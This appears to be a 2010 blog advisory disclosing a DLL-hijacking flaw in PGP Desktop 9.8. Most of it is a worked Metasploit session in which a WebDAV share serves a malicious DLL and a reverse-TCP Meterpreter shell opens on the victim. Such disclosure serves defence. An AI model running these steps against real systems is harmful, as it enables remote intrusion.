no one is safe ...

Advisory: PGP Desktop 9.8 - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 08.09.2010]

Posted Sun, 2010-08-29 20:34 by m1k3

---------------------------------------------
PGP Desktop 9.8 - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- PGP Desktop Description

PGP® Desktop Professional provides a comprehensive set of encryption applications to protect sensitive data in email and instant messages and on disk or removable media. PGP Desktop Professional secures confidential data, protecting sensitive business information and helping to meet partner and regulatory mandates for information security and privacy.

- Insecure Library Loading allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS pgp"

For more vulnerability details please check the links in the reference section.

- Affected Versions

PGP Desktop 9.8 - 9.8.3 Build 4028 - other releases may also be affected.

- Solution

It is not known if there are fixed releases available.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

- Exploiting example:

msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgp
EXTENSIONS => pgp
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  pgp              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.

<snip>
[*] 10.8.28.55:49183 PROPFIND /documents/
[*] 10.8.28.55:49183 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49183 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49183 PROPFIND /documents/policy.pgp
[*] 10.8.28.55:49183 PROPFIND => 207 File (/documents/policy.pgp)
[*] 10.8.28.55:49183 PROPFIND /documents/credssp.dll
[*] 10.8.28.55:49183 PROPFIND => 207 File (/documents/credssp.dll)
[*] 10.8.28.55:49183 PROPFIND /
[*] 10.8.28.55:49183 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49183 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49183 GET => DLL Payload
[*] 10.8.28.55:49183 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49183 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49183 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49183 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49183 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49183 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49183 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 1 opened (10.8.28.9:4444 -> 10.8.28.55:49189) at Sun Aug 29 20:40:27 +0200 2010


msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: m1k3-Vista\m1k3